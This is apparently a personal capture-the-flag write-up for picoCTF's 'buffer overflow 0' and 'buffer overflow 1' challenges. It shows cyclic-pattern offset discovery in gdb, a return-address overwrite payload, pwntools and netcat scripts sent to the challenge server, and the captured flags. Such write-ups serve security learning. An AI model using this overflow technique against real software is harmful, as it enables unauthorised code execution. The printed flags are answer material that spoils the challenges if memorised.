buffer overflow 0, buffer overflow 1

## buffer overflow 0 1. Create a long string, here I use `cyclic` ```shell ┌──(kali㉿kali)-[~] └─$ python3 Python 3.11.2 (main, Mar 13 2023, 12:18:29) [GCC 12.2.0] on linux Type "help", "copyright", "credits" or "license" for more information. >>> from pwn import * >>> cyclic(96) b'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaa' >>> ``` 2. Test it by running `vuln` ```shell ┌──(kali㉿kali)-[~/code] └─$ ./vuln Input: aaaabaaacaaadaaaeaaafaaagaaahaaa picoCTF{test} ``` Remember to 1. create a file named `flag.txt` and write something(here I wrote `picoCTF{test}`) in it. 2. `chmod +x ./vuln `, or else you won't be able to execute it 3. After making sure it can run, send the command to netcat! ```shell ┌──(kali㉿kali)-[~/code] └─$ nc saturn.picoctf.net 63397 Input: aaaabaaacaaadaaaeaaafaaagaaahaaaaaaabaaacaaadaaaeaaafaaagaaahaaa picoCTF{ov3rfl0ws_ar3nt_that_bad_8446a0c3} ``` ## buffer overflow 1 ### big endian VS little endian ### big ![](https://hackmd.io/_uploads/rkjcTdwi2.png) ### little ![](https://hackmd.io/_uploads/HyVjTODs2.png) ### appears in what occasion respectively 0x12345678 在**記憶體**中的儲存順序：0x78 0x56 0x34 0x12 0x12345678 在網路中的傳輸順序：0x12 0x34 0x56 0x78 ref:https://blog.gtwang.org/programming/difference-between-big-endian-and-little-endian-implementation-in-c/ ### Writeup 1. We need to create a long string to cause overflow. Here I use Python `cyclic` ```shell ┌──(kali㉿kali)-[~] └─$ python3 Python 3.11.2 (main, Mar 13 2023, 12:18:29) [GCC 12.2.0] on linux Type "help", "copyright", "credits" or "license" for more information. >>> from pwn import * >>> cyclic(96) b'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaa' >>> ``` or you can `import string` then create a string by `str1=string.asciilowercase()` and print it. 2. use `gdb` to see how many characters will cause overflow ```shell ┌──(kali㉿kali)-[~/code] └─$ gdb vuln GNU gdb (Debian 13.2-1) 13.2 Copyright (C) 2023 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "x86_64-linux-gnu". Type "show configuration" for configuration details. For bug reporting instructions, please see: <https://www.gnu.org/software/gdb/bugs/>. Find the GDB manual and other documentation resources online at: <http://www.gnu.org/software/gdb/documentation/>. For help, type "help". Type "apropos word" to search for commands related to "word"... Reading symbols from vuln... (No debugging symbols found in vuln) gdb-peda$ info function All defined functions: Non-debugging symbols: 0x08049000 _init 0x08049040 printf@plt 0x08049050 gets@plt 0x08049060 fgets@plt 0x08049070 getegid@plt 0x08049080 puts@plt 0x08049090 exit@plt 0x080490a0 __libc_start_main@plt 0x080490b0 setvbuf@plt 0x080490c0 fopen@plt 0x080490d0 setresgid@plt 0x080490e0 _start 0x08049120 _dl_relocate_static_pie 0x08049130 __x86.get_pc_thunk.bx 0x08049140 deregister_tm_clones 0x08049180 register_tm_clones 0x080491c0 __do_global_dtors_aux 0x080491f0 frame_dummy 0x080491f6 win 0x08049281 vuln 0x080492c4 main 0x0804933e get_return_address 0x08049350 __libc_csu_init 0x080493c0 __libc_csu_fini 0x080493c5 __x86.get_pc_thunk.bp 0x080493cc _fini gdb-peda$ r Starting program: /home/kali/code/vuln [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". Please enter your string: aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaa Okay, time to return... Fingers Crossed... Jumping to 0x6161616c Program received signal SIGSEGV, Segmentation fault. Warning: 'set logging off', an alias for the command 'set logging enabled', is deprecated. Use 'set logging enabled off'. Warning: 'set logging on', an alias for the command 'set logging enabled', is deprecated. Use 'set logging enabled on'. [----------------------------------registers-----------------------------------] EAX: 0x41 ('A') EBX: 0x6161616a ('jaaa') ECX: 0xffffcfac --> 0x49be4100 EDX: 0x1 ESI: 0x8049350 (<__libc_csu_init>: endbr32) EDI: 0xf7ffcba0 --> 0x0 EBP: 0x6161616b ('kaaa') ESP: 0xffffd030 ("maaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaa") EIP: 0x6161616c ('laaa') EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] Invalid $PC address: 0x6161616c [------------------------------------stack-------------------------------------] 0000| 0xffffd030 ("maaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaa") 0004| 0xffffd034 ("naaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaa") 0008| 0xffffd038 ("oaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaa") 0012| 0xffffd03c ("paaaqaaaraaasaaataaauaaavaaawaaaxaaa") 0016| 0xffffd040 ("qaaaraaasaaataaauaaavaaawaaaxaaa") 0020| 0xffffd044 ("raaasaaataaauaaavaaawaaaxaaa") 0024| 0xffffd048 ("saaataaauaaavaaawaaaxaaa") 0028| 0xffffd04c ("taaauaaavaaawaaaxaaa") [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x6161616c in ?? () ``` we can see that `EIP` is replace with `laaa`(45th to 48th), and the rest (`maaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaa`) is not used. 3. What we want is to sneak in the location of `win`, which is `0x080491f6`. Therefore, the payload should be `aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaa\xf6\x91\x04\x08`, which replace `laaa` with `\xf6\x91\x04\x08`. Then use `echo` to send our payload ```shell= ┌──(kali㉿kali)-[~/code] └─$ echo "aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaa\xf6\x91\x04\x08" | nc saturn.picoctf.net 64317 Please enter your string: Okay, time to return... Fingers Crossed... Jumping to 0x80491f6 picoCTF{addr3ss3s_ar3_3asy_a8284f4f} ``` or use pwn to get the flag ```python= from pwn import * r=remote('saturn.picoctf.net',59041) print((r.recvuntil('\n'.encode('latin-1'))).decode('latin-1')) payload="aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaa\xf6\x91\x04\x08" print ('Sent: 0x' + binascii.hexlify(payload.encode('latin-1')).decode('latin-1') ) r.sendline(payload.encode('latin-1')) print((r.recvline()).decode('latin-1')) # Receive line after string is entered print((r.recv()).decode('latin-1')) # Receive the flag ``` Note that sending str directly will not work, probably because of problem with types(bytes or something? not sure) ```shell= ┌──(kali㉿kali)-[~/code] └─$ nc saturn.picoctf.net 59041 Please enter your string: aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaa\xf6\x91\x04\x08 Okay, time to return... Fingers Crossed... Jumping to 0x3666785c ```